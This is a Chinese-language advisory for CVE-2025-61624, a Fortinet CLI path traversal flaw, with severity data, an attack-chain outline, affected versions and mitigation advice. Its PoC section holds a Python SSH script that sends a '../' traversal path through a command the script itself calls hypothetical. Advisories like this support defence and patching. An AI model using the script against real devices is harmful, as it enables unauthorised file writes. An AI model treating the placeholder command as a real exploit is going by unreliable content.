CVE-2025-61624 Fortinet路径遍历漏洞

漏洞信息

漏洞编号

CVE-2025-61624

漏洞类型

路径遍历

CVSS评分

6.0 中危

攻击向量

本地 (AV:L)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiOS, FortiPAM, FortiProxy, FortiSwitchManager

漏洞概述

CVE-2025-61624是Fortinet多款产品（包括FortiOS、FortiPAM、FortiProxy和FortiSwitchManager）中存在的路径遍历漏洞。该漏洞源于对路径名的限制不当，允许经过身份验证且拥有管理员配置文件及读写权限的攻击者，利用特定的CLI命令在系统上写入或删除任意文件。此漏洞CVSS评分为6.0，属于中危级别，可能对系统完整性和可用性造成严重影响。

技术细节

该漏洞属于路径遍历漏洞（CWE-22），其技术原理在于受影响产品的CLI接口对特定命令中的文件路径参数缺乏严格的校验机制。攻击者必须拥有管理员级别的凭证及读写权限（PR:H）才能发起攻击。利用过程中，攻击者通过CLI提交包含“../”序列或绝对路径的特制参数，绕过应用程序预期的目录限制。由于系统未正确过滤这些路径字符，攻击者能够将文件操作重定向到文件系统的任意位置。成功利用此漏洞可导致任意文件写入（I:H）或删除（A:H），攻击者可能借此植入后门程序或破坏系统核心文件，从而完全控制受损系统的完整性与可用性。

攻击链分析

STEP 1

步骤1：获取访问权限

攻击者必须首先获取目标Fortinet设备的管理员级别凭证和CLI访问权限。

STEP 2

步骤2：识别漏洞命令

攻击者确认设备运行受影响的版本，并识别存在路径遍历缺陷的特定CLI命令。

STEP 3

步骤3：构造恶意载荷

攻击者构造包含路径遍历序列（如“../”）的文件路径参数，旨在访问受限目录之外的任意位置。

STEP 4

步骤4：执行攻击

通过CLI界面执行带有恶意参数的命令，触发任意文件写入或删除操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
PoC for CVE-2025-61624 (Path Traversal in Fortinet Products)
This script demonstrates the concept of the vulnerability.
Note: Actual exploitation requires valid admin credentials and specific CLI commands.
"""

import paramiko

def exploit(target_ip, username, password):
    # Establish SSH connection to the target device
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        ssh.connect(target_ip, username=username, password=password)
        chan = ssh.invoke_shell()
        
        # Wait for shell to initialize
        import time
        time.sleep(1)
        
        # The specific vulnerable CLI command is abstracted here.
        # The vulnerability lies in the file path argument.
        # Payload to write a file to an arbitrary location (e.g., /tmp/pwned.txt)
        malicious_path = "../../../../tmp/pwned.txt"
        
        # Example command structure (hypothetical based on description)
        # Vulnerable command might be something like 'execute backup config' or similar
        payload = f'execute some_vulnerable_command save {malicious_path}\n'
        
        chan.send(payload)
        time.sleep(2)
        
        output = chan.recv(1024).decode()
        print(f"Command output: {output}")
        
        if "Success" in output or "Command executed" in output:
            print("[+] Exploit successful! File likely written.")
        else:
            print("[-] Exploit failed or command not vulnerable.")
            
    except Exception as e:
        print(f"Error: {e}")
    finally:
        ssh.close()

if __name__ == "__main__":
    # Replace with actual target details
    exploit("192.168.1.1", "admin", "password")

影响范围

FortiOS 7.6.0 - 7.6.4

FortiOS 7.4.0 - 7.4.9

FortiOS 7.2 (所有版本)

FortiOS 7.0 (所有版本)

FortiOS 6.4 (所有版本)

FortiPAM 1.7.0

FortiPAM 1.6 (所有版本)

FortiPAM 1.5 (所有版本)

FortiPAM 1.4 (所有版本)

FortiPAM 1.3 (所有版本)

FortiPAM 1.2 (所有版本)

FortiPAM 1.1 (所有版本)

FortiPAM 1.0 (所有版本)

FortiProxy 7.6.0 - 7.6.4

FortiProxy 7.4.0 - 7.4.11

FortiProxy 7.2 (所有版本)

FortiProxy 7.0 (所有版本)

FortiSwitchManager 7.2.0 - 7.2.7

FortiSwitchManager 7.0.0 - 7.0.6

防御指南

临时缓解措施

建议立即检查受影响产品列表并应用官方安全补丁。在无法立即升级的情况下，应严格限制拥有管理员权限和读写权限的用户数量，并加强对系统配置文件和关键文件完整性的监控，以便及时发现异常的文件写入或删除行为。